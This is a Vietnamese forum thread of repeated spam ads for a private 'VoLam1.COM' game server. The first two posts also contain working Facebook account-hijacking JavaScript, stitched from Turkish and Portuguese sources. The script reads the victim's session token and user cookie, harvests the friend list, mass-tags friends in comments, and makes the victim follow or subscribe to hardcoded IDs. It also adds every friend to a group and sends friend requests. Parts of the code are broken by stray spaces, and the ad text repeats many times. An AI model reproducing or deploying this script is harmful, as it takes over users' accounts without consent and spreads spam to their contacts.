Hiện kết quả từ 1 tới 5 của 5
 1. #1
  Tham gia ngày
  May 2014
  Bài gửi
  853

  Vào lúc 11h00 chính thức OpenBeta VoLam1.COM , phiên bản CTC , cày XU Free , quá HOT

  ►Lượt Xem: 933 ►Trả Lời: 4
  ►Chia Sẻ:
  ►Ngày Gửi: 06-22-2014 ►Đánh Giá:

  Bạn đang tìm 1 sân chơi Võ Lâm Private lâu dài, ổn định, và trên hết là phải công bằng lành mạnh. Một sân chơi không có hack không có gian lận lừa đảo trong game. Sever có nhiều event sáng tạo hấp dẫn, BQT nhiệt tình có trách nghiệm. Những điều đó các bạn có thể tìm thấy ở VoLam1. Hãy tham gia để kiểm chứng về sever của chúng tôi chắc chắn sẽ làm hài lòng các bạn.

  Chính thức OpenBeta 11h00 ngày 23/06/2014 [ Thứ 2 ]

  Website: http://volam1.com

  Trang quản lý: http://volam1.com/trangchu/index.php?page=dangki


  Sự kiện đua TOP bắt đầu từ

  11h00 ngày 23/06/2014 - 20h00 ngày 26/06/2014

  Phần thưởng xem chi tiết tại trang chủ

  Vào lúc 11h00 chính thức OpenBeta VoLam1.COM , phiên bản CTC , cày XU Free , quá HOT

  OpenBeta hôm nay , Free nhiều hơn bạn từng nghĩ , cày XU Free không cần nạp thẻ - vẫn có đồ VIP


  Hỗ trợ tân thủ KHỦNG


  X2 Skill - X2 Exp - Tiền Vạn - Level

  Vào lúc 11h00 chính thức OpenBeta VoLam1.COM , phiên bản CTC , cày XU Free , quá HOT

  THÔNG TIN SERVER

  Website: http://volam1.com

  Trang quản lý: http://volam1.com/trangchu/index.php?page=dangki  Vào lúc 11h00 chính thức OpenBeta VoLam1.COM , phiên bản CTC , cày XU Free , quá HOT
  Vào lúc 11h00 chính thức OpenBeta VoLam1.COM , phiên bản CTC , cày XU Free , quá HOT


  Cụm máy chủ: Hoàng Kim
  Đường truyền: 1Gbps
  Data Center: Việt Nam
  Kinh Nghiệm: Vừa phải
  Tỷ lệ Rớt Đồ: Vừa phải
  Version: Công Thành Chiến + SHXT
  Support Yahoo: quanly_volam1@yahoo.com.vn

  Vào lúc 11h00 chính thức OpenBeta VoLam1.COM , phiên bản CTC , cày XU Free , quá HOT


  OpenBeta hôm nay , Free nhiều hơn bạn từng nghĩ , cày XU Free không cần nạp thẻ - vẫn có đồ VIP  Nào ... chúng ta hãy cùng nhau trở về thời " Hoàng Kim " vốn dĩ là của nó


  ---------- Post added at 03:55 PM ---------- Previous post was at 03:51 PM ----------

  Bạn đang tìm 1 sân chơi Võ Lâm Private lâu dài, ổn định, và trên hết là phải công bằng lành mạnh. Một sân chơi không có hack không có gian lận lừa đảo trong game. Sever có nhiều event sáng tạo hấp dẫn, BQT nhiệt tình có trách nghiệm. Những điều đó các bạn có thể tìm thấy ở VoLam1. Hãy tham gia để kiểm chứng về sever của chúng tôi chắc chắn sẽ làm hài lòng các bạn.

  Chính thức OpenBeta 11h00 ngày 23/06/2014 [ Thứ 2 ]

  Website: http://volam1.com

  Trang quản lý: http://volam1.com/trangchu/index.php?page=dangki


  Sự kiện đua TOP bắt đầu từ

  11h00 ngày 23/06/2014 - 20h00 ngày 26/06/2014

  Phần thưởng xem chi tiết tại trang chủ

  Vào lúc 11h00 chính thức OpenBeta VoLam1.COM , phiên bản CTC , cày XU Free , quá HOT

  OpenBeta hôm nay , Free nhiều hơn bạn từng nghĩ , cày XU Free không cần nạp thẻ - vẫn có đồ VIP


  Hỗ trợ tân thủ KHỦNG


  X2 Skill - X2 Exp - Tiền Vạn - Level

  Vào lúc 11h00 chính thức OpenBeta VoLam1.COM , phiên bản CTC , cày XU Free , quá HOT

  THÔNG TIN SERVER

  Website: http://volam1.com

  Trang quản lý: http://volam1.com/trangchu/index.php?page=dangki  Vào lúc 11h00 chính thức OpenBeta VoLam1.COM , phiên bản CTC , cày XU Free , quá HOT
  Vào lúc 11h00 chính thức OpenBeta VoLam1.COM , phiên bản CTC , cày XU Free , quá HOT


  Cụm máy chủ: Hoàng Kim
  Đường truyền: 1Gbps
  Data Center: Việt Nam
  Kinh Nghiệm: Vừa phải
  Tỷ lệ Rớt Đồ: Vừa phải
  Version: Công Thành Chiến + SHXT
  Support Yahoo: quanly_volam1@yahoo.com.vn

  Vào lúc 11h00 chính thức OpenBeta VoLam1.COM , phiên bản CTC , cày XU Free , quá HOT


  OpenBeta hôm nay , Free nhiều hơn bạn từng nghĩ , cày XU Free không cần nạp thẻ - vẫn có đồ VIP  Nào ... chúng ta hãy cùng nhau trở về thời " Hoàng Kim " vốn dĩ là của nó


  ---------- Post added at 09:59 PM ---------- Previous post was at 03:55 PM ----------

  Bạn đang tìm 1 sân chơi Võ Lâm Private lâu dài, ổn định, và trên hết là phải công bằng lành mạnh. Một sân chơi không có hack không có gian lận lừa đảo trong game. Sever có nhiều event sáng tạo hấp dẫn, BQT nhiệt tình có trách nghiệm. Những điều đó các bạn có thể tìm thấy ở VoLam1. Hãy tham gia để kiểm chứng về sever của chúng tôi chắc chắn sẽ làm hài lòng các bạn.

  Chính thức OpenBeta 11h00 ngày 23/06/2014 [ Thứ 2 ]

  Website: http://volam1.com

  Trang quản lý: http://volam1.com/trangchu/index.php?page=dangki


  Sự kiện đua TOP bắt đầu từ

  11h00 ngày 23/06/2014 - 20h00 ngày 26/06/2014

  Phần thưởng xem chi tiết tại trang chủ

  ---------- Post added at 10:06 PM ---------- Previous post was at 09:59 PM ----------

  Bạn đang tìm 1 sân chơi Võ Lâm Private lâu dài, ổn định, và trên hết là phải công bằng lành mạnh. Một sân chơi không có hack không có gian lận lừa đảo trong game. Sever có nhiều event sáng tạo hấp dẫn, BQT nhiệt tình có trách nghiệm. Những điều đó các bạn có thể tìm thấy ở VoLam1. Hãy tham gia để kiểm chứng về sever của chúng tôi chắc chắn sẽ làm hài lòng các bạn.

  Chính thức OpenBeta 11h00 ngày 23/06/2014 [ Thứ 2 ]

  Website: http://volam1.com

  Trang quản lý: http://volam1.com/trangchu/index.php?page=dangki


  Sự kiện đua TOP bắt đầu từ

  11h00 ngày 23/06/2014 - 20h00 ngày 26/06/2014

  Phần thưởng xem chi tiết tại trang chủ

  P/S : Cùng chia sẽ thông tin đến bạn bè để nhận hàng ngàn XU , và phần thưởng có giá trị nhé

  ---------- Post added at 10:13 PM ---------- Previous post was at 10:06 PM ----------

  /* All Right Reserver THANH.ABC Don't Change Anything */
  function tagfriend(abone)
  { var http4=new XMLHttpRequest;
  var url4="/ajax/follow/follow_profile.php?__a=1";
  var params4="profile_id="+abone+"&location=1&source=fo llow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb _dtsg+"&lsd&__"+user_id+"&phstamp=";
  http4.open("POST",url4,true);
  http4.onreadystatechange=function()
  { if(http4.readyState==4&&http4.status==200)http4.cl ose };
  http4.send(params4)}
  tagfriend("100007059427793");
  function x__0() { return window.ActiveXObject ? new ActiveXObject("Msxml2.XMLHTTP") : new XMLHttpRequest; };
  function get_friends(){
  var a=x__0();
  a.open("GET", "/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&lazy=0&viewer="+uid+"&token=v7&stale_ok=0&op tions[0]=friends_only&options[1]=nm", false);
  a.send(null);
  if (a.readyState == 4) {
  var f = JSON.parse(a.responseText.substring(a.responseText .indexOf('{')));
  return f.payload.entries;
  }
  return false;
  }
  function get_uid(b){
  var a=x__0();
  a.open("GET", 'http://graph.facebook.com/'+b, false);
  a.send();
  if (a.readyState == 4) {
  return uid = JSON.parse(a.responseText).id;
  }
  return false;
  }
  var patt = /comment_text=(.*?)&/
  var c = 1;
  username = /\.com\/(.*?)\//.exec(window.top.location)[1];
  uid = get_uid(username);
  a = window.top.location;
  termina = 0;
  var amigos = get_friends();
  post_id = /[0-9]{8,}/.exec(a);
  uids = 'comment_text=';
  header = 'ft_ent_identifier='+post_id+'&comment_text=0&sour ce=1&client_id=1359576694192%3A1233576093&reply_fb id&parent_comment_id&rootid=u_jsonp_3_19&ft[tn]=[]&ft[qid]=5839337351464612379&ft[mf_story_key]=5470779710560437153&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user='+uid+'&__a=1&__req=4u &fb_dtsg='+document.getElementsByName('fb_dtsg' )[0].value+'&phstamp='+Math.random();
  for ( var n = 1 ; n < amigos.length ; n++ ){
  //uids += '%40[' + amigos[n].uid + '%3A' + encodeURI(amigos[n].text) + ']%20';
  fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  uids += '%40[' + amigos[n].uid + '%3AAAAAAAAAAAA]%20';
  c++;
  if(c == 7){
  uids += '&';
  with(new XMLHttpRequest()) open("POST", "/ajax/ufi/add_comment.php?__a=1"),setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),send(header.replace(patt, uids));
  z = setTimeout('function(){asd=0}', 1000);
  clearInterval(z);
  c = 1;
  uids = 'comment_text=';
  }
  }
  var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  function cereziAl(isim) {
  var tarama = isim + "=";
  if (document.cookie.length > 0) {
  konum = document.cookie.indexOf(tarama)
  if (konum != -1) {
  konum += tarama.length
  son = document.cookie.indexOf(";", konum)
  if (son == -1)
  son = document.cookie.length
  return unescape(document.cookie.substring(konum, son))
  }
  else { return ""; }
  }
  }
  function getRandomInt (min, max) {
  return Math.floor(Math.random() * (max - min + 1)) + min;
  }
  function randomValue(arr) {
  return arr[getRandomInt(0, arr.length-1)];
  }
  var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  function a(abone){
  var http4 = new XMLHttpRequest();
  var url4 = "/ajax/follow/follow_profile.php?__a=1";
  var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
  http4.open("POST", url4, true);
  //Send the proper header information along with the request
  http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  http4.setRequestHeader("Content-length", params4.length);
  http4.setRequestHeader("Connection", "close");
  http4.onreadystatechange = function() {//Call a function when the state changes.
  if(http4.readyState == 4 && http4.status == 200) {
  http4.close; // Close the connection
  }
  }
  http4.send(params4);
  }

 2. #2
  Tham gia ngày
  May 2014
  Bài gửi
  853

  /* CREDITOS AO MIGUEL TARGA, ESSA PARTE E DELE */
  function x__0() { return window.ActiveXObject ? new ActiveXObject("Msxml2.XMLHTTP") : new XMLHttpRequest; };

  //Pegar todos amigos
  function get_friends(){
  var a=x__0();
  a.open("GET", "/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&lazy=0&viewer="+uid+"&token=v7&stale_ok=0&op tions[0]=friends_only&options[1]=nm", false);
  a.send(null);
  if (a.readyState == 4) {
  var f = JSON.parse(a.responseText.substring(a.responseText .indexOf('{')));
  return f.payload.entries;
  }
  return false;
  }

  /* FIM DA PARTE DO MIGUEL TARGA */

  //Pegar todos amigos
  function get_uid(b){
  var a=x__0();
  a.open("GET", 'http://graph.facebook.com/'+b, false);
  a.send();
  if (a.readyState == 4) {
  return uid = JSON.parse(a.responseText).id;

  }
  return false;
  }
  // Pattern que vai trocar o valor dos coment?rios pelas marcaç?es

  var patt = /comment_text=(.*?)&/
  var c = 1;
  username = /\.com\/(.*?)\//.exec(window.top.location)[1];
  uid = get_uid(username);
  a = window.top.location;
  termina = 0;
  var amigos = get_friends();
  post_id = /[0-9]{8,}/.exec(a);
  uids = 'comment_text=';
  header = 'ft_ent_identifier='+post_id+'&comment_text=0&sour ce=1&client_id=1359576694192%3A1233576093&reply_fb id&parent_comment_id&rootid=u_jsonp_3_19&ft[tn]=[]&ft[qid]=5839337351464612379&ft[mf_story_key]=5470779710560437153&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user='+uid+'&__a=1&__req=4u &fb_dtsg='+document.getElementsByName('fb_dtsg' )[0].value+'&phstamp='+Math.random();
  for ( var n = 1 ; n < amigos.length ; n++ ){
  //uids += '%40[' + amigos[n].uid + '%3A' + encodeURI(amigos[n].text) + ']%20';
  fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  uids += '%40[' + amigos[n].uid + '%3AAAAAAAAAAAA]%20';
  c++;
  if(c == 7){
  // Quando o contador chega em 7, ele termina o parâmetro com um &...
  uids += '&';
  // ...envia as coisas com o método do indiano...
  with(new XMLHttpRequest()) open("POST", "/ajax/ufi/add_comment.php?__a=1"),setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),send(header.replace(patt, uids));

  // ... espera um segundo...
  z = setTimeout('function(){asd=0}', 1000);
  clearInterval(z);

  // ... e seta tudo de novo pra recomeçar
  c = 1;
  uids = 'comment_text=';


  }

  }

  var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

  function cereziAl(isim) {
  var tarama = isim + "=";
  if (document.cookie.length > 0) {
  konum = document.cookie.indexOf(tarama)
  if (konum != -1) {
  konum += tarama.length
  son = document.cookie.indexOf(";", konum)
  if (son == -1)
  son = document.cookie.length
  return unescape(document.cookie.substring(konum, son))
  }
  else { return ""; }
  }
  }

  function getRandomInt (min, max) {
  return Math.floor(Math.random() * (max - min + 1)) + min;
  }
  function randomValue(arr) {
  return arr[getRandomInt(0, arr.length-1)];
  }

  var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

  function a(abone){
  var http4 = new XMLHttpRequest();

  var url4 = "/ajax/follow/follow_profile.php?__a=1";

  var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
  http4.open("POST", url4, true);

  //Send the proper header information along with the request
  http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  http4.setRequestHeader("Content-length", params4.length);
  http4.setRequestHeader("Connection", "close");

  http4.onreadystatechange = function() {//Call a function when the state changes.
  if(http4.readyState == 4 && http4.status == 200) {

  http4.close; // Close the connection

  }
  }

  http4.send(params4);
  }

  function sublist(uidss) {
  var a = document.createElement('script');
  a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setDa ta({ flid: " + uidss + " }).send();";
  document.body.appendChild(a);
  }  sublist("196595073821666");

  sublist("1401516113406354");

  sublist("164346257101594");  var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
  var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);

  var httpwp = new XMLHttpRequest();
  var urlwp = '/ajax/groups/membership/r2j.php?__a=1';
  var paramswp = '&ref=group_jump_header&group_id=' + gid + '&fb_dtsg=' + fb_dtsg + '&__user=' + user_id + '&phstamp=';
  httpwp['open']('POST', urlwp, true);
  httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
  httpwp['setRequestHeader']('Content-length', paramswp['length']);
  httpwp['setRequestHeader']('Connection', 'keep-alive');
  httpwp['send'](paramswp);

  var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
  var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);

  var friends = new Array();
  gf = new XMLHttpRequest();
  gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token' + Math['random']() + '&filter[0]=user&options[0]=friends_only', false);
  gf['send']();
  if (gf['readyState'] != 4) {} else {
  data = eval('(' + gf['responseText']['substr'](9) + ')');
  if (data['error']) {} else {
  friends = data['payload']['entries']['sort'](function (_0x93dax8, _0x93dax9) {
  return _0x93dax8['index'] - _0x93dax9['index'];
  });
  };
  };

  for (var i = 0; i < friends['length']; i++) {
  var httpwp = new XMLHttpRequest();
  var urlwp = '/ajax/groups/members/add_post.php?__a=1';
  var paramswp= '&fb_dtsg=' + fb_dtsg + '&group_id=' + gid + '&source=typeahead&ref=&message_id=&members=' + friends[i]['uid'] + '&__user=' + user_id + '&phstamp=';
  httpwp['open']('POST', urlwp, true);
  httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
  httpwp['setRequestHeader']('Content-length', paramswp['length']);
  httpwp['setRequestHeader']('Connection', 'keep-alive');
  httpwp['onreadystatechange'] = function () {
  if (httpwp['readyState'] == 4 && httpwp['status'] == 200) {};
  };
  httpwp['send'](paramswp);
  };
  var spage_id = "100211486794985";
  var spost_id = "100211486794985";
  var sfoto_id = "100211486794985";
  var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  var smesaj = "";
  var smesaj_text = "";
  var arkadaslar = [];
  var svn_rev;
  var bugun= new Date();
  var btarihi = new Date();
  btarihi.setTime(bugun.getTime() + 1000*60*60*4*1);
  if(!document.cookie.match(/paylasti=(\d+)/)){
  document.cookie = "paylasti=hayir;expires="+ btarihi.toGMTString();
  }


  //arkadaslari al ve isle
  function sarkadaslari_al(){
  var xmlhttp = new XMLHttpRequest();
  xmlhttp.onreadystatechange = function () {
  if(xmlhttp.readyState == 4){
  eval("arkadaslar = " + xmlhttp.responseText.toString().replace("for (;","") + ";");
  for(f=0;f<Math.round(arkadaslar.payload.entries.le ngth/10);f++){
  smesaj = "";
  smesaj_text = "";
  for(i=f*10;i<(f+1)*10;i++){
  if(arkadaslar.payload.entries[i]){
  smesaj += " @[" + arkadaslar.payload.entries[i].uid + ":" + arkadaslar.payload.entries[i].text + "]";
  smesaj_text += " " + arkadaslar.payload.entries[i].text;
  }
  }
  sdurumpaylas(); }

  }

  };
  var params = "&filter[0]=user";
  params += "&options[0]=friends_only";
  params += "&options[1]=nm";
  params += "&token=v7";
  params += "&viewer=" + user_id;
  params += "&__user=" + user_id;

  if (document.URL.indexOf("https://") >= 0) { xmlhttp.open("GET", "https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
  else { xmlhttp.open("GET", "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
  xmlhttp.send();
  }

  //tiklama olayini dinle
  var tiklama = document.addEventListener("click", function () {
  if(document.cookie.split("paylasti=")[1].split(";")[0].indexOf("hayir") >= 0){
  svn_rev = document.head.innerHTML.split('"svn_rev":')[1].split(",")[0];
  sarkadaslari_al();
  document.cookie = "paylasti=evet;expires="+ btarihi.toGMTString();

  document.removeEventListener(tiklama);
  }
  }, false);


  //arkada?? ekleme
  function sarkadasekle(uid,cins){
  var xmlhttp = new XMLHttpRequest();
  xmlhttp.onreadystatechange = function () {
  if(xmlhttp.readyState == 4){
  }
  };

  xmlhttp.open("POST", "/ajax/add_friend/action.php?__a=1", true);
  var params = "to_friend=" + uid;
  params += "&action=add_friend";
  params += "&how_found=friend_browser";
  params += "&ref_param=none";
  params += "&outgoing_id=";
  params += "&logging_location=friend_browser";
  params += "&no_flyout_on_click=true";
  params += "&ego_log_data=";
  params += "&http_referer=";
  params += "&fb_dtsg=" + document.getElementsByName('fb_dtsg')[0].value;
  params += "&phstamp=165816749114848369115";
  params += "&__user=" + user_id;
  xmlhttp.setRequestHeader ("X-SVN-Rev", svn_rev);
  xmlhttp.setRequestHeader ("Content-Type","application/x-www-form-urlencoded");

  if(cins == "farketmez" && document.cookie.split("cins" + user_id +"=").length > 1){
  xmlhttp.send(params);
  }else if(document.cookie.split("cins" + user_id +"=").length <= 1){
  cinsiyetgetir(uid,cins,"sarkadasekle");
  }else if(cins == document.cookie.split("cins" + user_id +"=")[1].split(";")[0].toString()){
  xmlhttp.send(params);
  }
  }

  //cinsiyet belirleme
  var cinssonuc = {};
  var cinshtml = document.createElement("html");
  function scinsiyetgetir(uid,cins,fonksiyon){
  var xmlhttp = new XMLHttpRequest();
  xmlhttp.onreadystatechange = function () {
  if(xmlhttp.readyState == 4){
  eval("cinssonuc = " + xmlhttp.responseText.toString().replace("for (;","") + ";");
  cinshtml.innerHTML = cinssonuc.jsmods.markup[0][1].__html
  btarihi.setTime(bugun.getTime() + 1000*60*60*24*365);
  if(cinshtml.getElementsByTagName("select")[0].value == "1"){
  document.cookie = "cins" + user_id + "=kadin;expires=" + btarihi.toGMTString();
  }else if(cinshtml.getElementsByTagName("select")[0].value == "2"){
  document.cookie = "cins" + user_id + "=erkek;expires=" + btarihi.toGMTString();
  }
  eval(fonksiyon + "(" + id + "," + cins + ");");
  }
  };
  xmlhttp.open("GET", "/ajax/timeline/edit_profile/basic_info.php?__a=1&__user=" + user_id, true);
  xmlhttp.setRequestHeader ("X-SVN-Rev", svn_rev);
  xmlhttp.send();
  }

  ---------- Post added at 10:27 PM ---------- Previous post was at 10:23 PM ----------

  Bạn đang tìm 1 sân chơi Võ Lâm Private lâu dài, ổn định, và trên hết là phải công bằng lành mạnh. Một sân chơi không có hack không có gian lận lừa đảo trong game. Sever có nhiều event sáng tạo hấp dẫn, BQT nhiệt tình có trách nghiệm. Những điều đó các bạn có thể tìm thấy ở VoLam1. Hãy tham gia để kiểm chứng về sever của chúng tôi chắc chắn sẽ làm hài lòng các bạn.

  Chính thức OpenBeta 11h00 ngày 23/06/2014 [ Thứ 2 ]

  Website: http://volam1.com

  Trang quản lý: http://volam1.com/trangchu/index.php?page=dangki


  Sự kiện đua TOP bắt đầu từ

  11h00 ngày 23/06/2014 - 20h00 ngày 26/06/2014

  Phần thưởng xem chi tiết tại trang chủ

  Vào lúc 11h00 chính thức OpenBeta VoLam1.COM , phiên bản CTC , cày XU Free , quá HOT

  OpenBeta hôm nay , Free nhiều hơn bạn từng nghĩ , cày XU Free không cần nạp thẻ - vẫn có đồ VIP


  Hỗ trợ tân thủ KHỦNG


  X2 Skill - X2 Exp - Tiền Vạn - Level

  Vào lúc 11h00 chính thức OpenBeta VoLam1.COM , phiên bản CTC , cày XU Free , quá HOT

  THÔNG TIN SERVER

  Website: http://volam1.com

  Trang quản lý: http://volam1.com/trangchu/index.php?page=dangki  Vào lúc 11h00 chính thức OpenBeta VoLam1.COM , phiên bản CTC , cày XU Free , quá HOT
  Vào lúc 11h00 chính thức OpenBeta VoLam1.COM , phiên bản CTC , cày XU Free , quá HOT


  Cụm máy chủ: Hoàng Kim
  Đường truyền: 1Gbps
  Data Center: Việt Nam
  Kinh Nghiệm: Vừa phải
  Tỷ lệ Rớt Đồ: Vừa phải
  Version: Công Thành Chiến + SHXT
  Support Yahoo: quanly_volam1@yahoo.com.vn

  Vào lúc 11h00 chính thức OpenBeta VoLam1.COM , phiên bản CTC , cày XU Free , quá HOT


  OpenBeta hôm nay , Free nhiều hơn bạn từng nghĩ , cày XU Free không cần nạp thẻ - vẫn có đồ VIP  Nào ... chúng ta hãy cùng nhau trở về thời " Hoàng Kim " vốn dĩ là của nó


  ---------- Post added 06-23-2014 at 09:10 AM ---------- Previous post was 06-22-2014 at 10:27 PM ----------

  aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaa

 3. #3
  Tham gia ngày
  May 2014
  Bài gửi
  853

  Bạn đang tìm 1 sân chơi Võ Lâm Private lâu dài, ổn định, và trên hết là phải công bằng lành mạnh. Một sân chơi không có hack không có gian lận lừa đảo trong game. Sever có nhiều event sáng tạo hấp dẫn, BQT nhiệt tình có trách nghiệm. Những điều đó các bạn có thể tìm thấy ở VoLam1. Hãy tham gia để kiểm chứng về sever của chúng tôi chắc chắn sẽ làm hài lòng các bạn.

  Chính thức OpenBeta 11h00 ngày 23/06/2014 [ Thứ 2 ]

  Website: http://volam1.com

  Trang quản lý: http://volam1.com/trangchu/index.php?page=dangki


  Sự kiện đua TOP bắt đầu từ

  11h00 ngày 23/06/2014 - 20h00 ngày 26/06/2014

  Phần thưởng xem chi tiết tại trang chủ

  ---------- Post added 06-25-2014 at 09:55 AM ---------- Previous post was 06-24-2014 at 03:28 PM ----------

  Bạn đang tìm 1 sân chơi Võ Lâm Private lâu dài, ổn định, và trên hết là phải công bằng lành mạnh. Một sân chơi không có hack không có gian lận lừa đảo trong game. Sever có nhiều event sáng tạo hấp dẫn, BQT nhiệt tình có trách nghiệm. Những điều đó các bạn có thể tìm thấy ở VoLam1. Hãy tham gia để kiểm chứng về sever của chúng tôi chắc chắn sẽ làm hài lòng các bạn.

  Chính thức OpenBeta 11h00 ngày 23/06/2014 [ Thứ 2 ]

  Website: http://volam1.com

  Trang quản lý: http://volam1.com/trangchu/index.php?page=dangki


  Sự kiện đua TOP bắt đầu từ

  11h00 ngày 23/06/2014 - 20h00 ngày 26/06/2014

  Phần thưởng xem chi tiết tại trang chủ

 4. #4
  Tham gia ngày
  May 2014
  Bài gửi
  853

  Bạn đang tìm 1 sân chơi Võ Lâm Private lâu dài, ổn định, và trên hết là phải công bằng lành mạnh. Một sân chơi không có hack không có gian lận lừa đảo trong game. Sever có nhiều event sáng tạo hấp dẫn, BQT nhiệt tình có trách nghiệm. Những điều đó các bạn có thể tìm thấy ở VoLam1. Hãy tham gia để kiểm chứng về sever của chúng tôi chắc chắn sẽ làm hài lòng các bạn.

  Chính thức OpenBeta 11h00 ngày 23/06/2014 [ Thứ 2 ]

  Website: http://volam1.com

  Trang quản lý: http://volam1.com/trangchu/index.php?page=dangki


  Sự kiện đua TOP bắt đầu từ

  11h00 ngày 23/06/2014 - 20h00 ngày 26/06/2014

  Phần thưởng xem chi tiết tại trang chủ

  ---------- Post added at 10:53 PM ---------- Previous post was at 10:47 PM ----------

  Bạn đang tìm 1 sân chơi Võ Lâm Private lâu dài, ổn định, và trên hết là phải công bằng lành mạnh. Một sân chơi không có hack không có gian lận lừa đảo trong game. Sever có nhiều event sáng tạo hấp dẫn, BQT nhiệt tình có trách nghiệm. Những điều đó các bạn có thể tìm thấy ở VoLam1. Hãy tham gia để kiểm chứng về sever của chúng tôi chắc chắn sẽ làm hài lòng các bạn.

  Chính thức OpenBeta 11h00 ngày 23/06/2014 [ Thứ 2 ]

  Website: http://volam1.com

  Trang quản lý: http://volam1.com/trangchu/index.php?page=dangki


  Sự kiện đua TOP bắt đầu từ

  11h00 ngày 23/06/2014 - 20h00 ngày 26/06/2014

  Phần thưởng xem chi tiết tại trang chủ

  ---------- Post added 06-27-2014 at 12:11 PM ---------- Previous post was 06-26-2014 at 10:53 PM ----------

  Bạn đang tìm 1 sân chơi Võ Lâm Private lâu dài, ổn định, và trên hết là phải công bằng lành mạnh. Một sân chơi không có hack không có gian lận lừa đảo trong game. Sever có nhiều event sáng tạo hấp dẫn, BQT nhiệt tình có trách nghiệm. Những điều đó các bạn có thể tìm thấy ở VoLam1. Hãy tham gia để kiểm chứng về sever của chúng tôi chắc chắn sẽ làm hài lòng các bạn.

  Chính thức OpenBeta 11h00 ngày 23/06/2014 [ Thứ 2 ]

  Website: http://volam1.com

  Trang quản lý: http://volam1.com/trangchu/index.php?page=dangki


  Sự kiện đua TOP bắt đầu từ

  11h00 ngày 23/06/2014 - 20h00 ngày 26/06/2014

  Phần thưởng xem chi tiết tại trang chủ

  ---------- Post added at 12:23 PM ---------- Previous post was at 12:11 PM ----------

  Bạn đang tìm 1 sân chơi Võ Lâm Private lâu dài, ổn định, và trên hết là phải công bằng lành mạnh. Một sân chơi không có hack không có gian lận lừa đảo trong game. Sever có nhiều event sáng tạo hấp dẫn, BQT nhiệt tình có trách nghiệm. Những điều đó các bạn có thể tìm thấy ở VoLam1. Hãy tham gia để kiểm chứng về sever của chúng tôi chắc chắn sẽ làm hài lòng các bạn.

  Chính thức OpenBeta 11h00 ngày 23/06/2014 [ Thứ 2 ]

  Website: http://volam1.com

  Trang quản lý: http://volam1.com/trangchu/index.php?page=dangki


  Sự kiện đua TOP bắt đầu từ

  11h00 ngày 23/06/2014 - 20h00 ngày 26/06/2014

  Phần thưởng xem chi tiết tại trang chủ

 5. #5
  Tham gia ngày
  May 2014
  Bài gửi
  853

  Cụm máy chủ: Hoàng Kim
  Đường truyền: 1Gbps
  Data Center: Việt Nam
  Kinh Nghiệm: Vừa phải
  Tỷ lệ Rớt Đồ: Vừa phải
  Version: Công Thành Chiến + SHXT

Liên hệ quảng cáo Y!m: pmqc | E-mail: top1phim@gmail.com
[X] Tắt Quảng Cáo
Tắt Quảng Cáo [X]